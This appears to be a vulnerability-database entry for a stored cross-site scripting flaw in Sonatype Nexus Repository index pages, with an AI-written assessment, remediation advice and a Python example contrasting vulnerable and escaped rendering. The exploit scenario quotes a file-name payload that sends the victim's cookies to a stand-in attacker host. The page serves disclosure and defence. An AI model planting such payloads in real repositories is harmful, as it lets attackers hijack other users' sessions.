Severity by source

CVSS Vector (NVD): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.
Description (CVE.org)
An authenticated user with upload permission to a hosted repository can store content that causes arbitrary JavaScript to execute in the browser of any user who browses that repository directory via the HTML index page in Sonatype Nexus Repository versions 3.6.0 through versions before 3.92.0. This could allow the attacker to perform actions in the context of the victim's session.
Analysis (AI)
Stored cross-site scripting (XSS) in Sonatype Nexus Repository 3.6.0 through 3.91.x allows authenticated users with upload permissions to inject malicious JavaScript into repository content, which executes in the browsers of any user viewing the affected repository directory via the HTML index page. An attacker can perform unauthorized actions within a victim's session context, including potential data theft or privilege escalation depending on the victim's role. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
|---|---|
| Exploitation | Exploitation requires the following specific conditions: (1) the attacker must be an authenticated user with upload permissions to a hosted repository in Nexus Repository versions 3.6.0 through 3.91.x; (2) the victim must browse the repository directory using the web UI's HTML index page feature (not via API or command-line tools); (3) the victim's browser must execute JavaScript (no protection from browser security policies or user agent modifications). … |
| Risk Assessment | The CVSS v4.0 score of 5.1 with vector AV:N/AC:L/AT:N/PR:L/UI:P reflects a medium-severity vulnerability with network attack vector, low attack complexity, and low privilege requirements (authenticated user with upload permission). … |
| Exploit Scenario | An attacker with legitimate upload permissions to a Nexus Repository (e.g., a disgruntled developer, compromised CI/CD pipeline account, or malicious third-party contributor) uploads a file with a name containing a JavaScript payload, such as '"><script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script><a href="', or embeds the payload in artifact metadata. When a repository administrator or another developer browses the repository directory via the web UI to review or manage content, the HTML index page renders the malicious script, which executes in their browser with their session privileges. … |
| Remediation | Upgrade Sonatype Nexus Repository to version 3.92.0 or later, which includes the security patch for this XSS vulnerability. … |
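The exploit scenario above comes down to one rendering mistake: an attacker-controlled file name is written into the HTML index page without being encoded for the contexts it lands in (an `href` attribute and element text). The following is an added example, not Sonatype's code and not how Nexus renders its index pages; the function names, the `SAMPLE_ENTRIES` listing and the parser-based check are all constructed here to contrast a vulnerable renderer with a hardened one.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed sample directory listing (not real Nexus data). The last entry
# carries an attacker-controlled name of the kind the exploit scenario
# describes: it tries to close the <a> tag and inject a <script> element.
SAMPLE_ENTRIES = [
    "README.txt",
    "lib-1.0.jar",
    '"><script>alert(1)</script><a href="',
]


def render_index_vulnerable(entries):
    """Hypothetical buggy index renderer: builds markup by string concatenation
    and writes the raw file name into both the href attribute and the link text.
    """
    rows = [f'<li><a href="{name}">{name}</a></li>' for name in entries]
    return "<ul>" + "".join(rows) + "</ul>"


def render_index_hardened(entries):
    """Same listing, but every file name is encoded for the context it lands in:
    percent-encoded for the URL attribute, HTML-escaped (including quotes) for
    the visible link text. The name can no longer terminate the tag or attribute.
    """
    rows = []
    for name in entries:
        href = quote(name, safe="")  # URL context: encode everything non-unreserved
        text = html.escape(name, quote=True)  # HTML text context: < > & " '
        rows.append(f'<li><a href="{href}">{text}</a></li>')
    return "<ul>" + "".join(rows) + "</ul>"


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them,
    so escaped text such as &lt;script&gt; is correctly not counted."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def count_script_elements(markup):
    """Returns how many real <script> elements the rendered index contains."""
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    for renderer in (render_index_vulnerable, render_index_hardened):
        page = renderer(SAMPLE_ENTRIES)
        print(f"{renderer.__name__}: {count_script_elements(page)} script element(s)")
```

The check deliberately parses the output rather than searching for the literal string `<script`, because the hardened output still contains that sequence in escaped form (`&lt;script&gt;`) and a substring match would wrongly flag it. The same two-context rule applies wherever the upload reaches a page, including the artifact metadata the scenario mentions: encode at the output point for the exact context (attribute, text, URL), never by a single global filter on input.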
External POC / Exploit Code

- EUVD-2026-29179
- GHSA-f5g6-q897-4w8f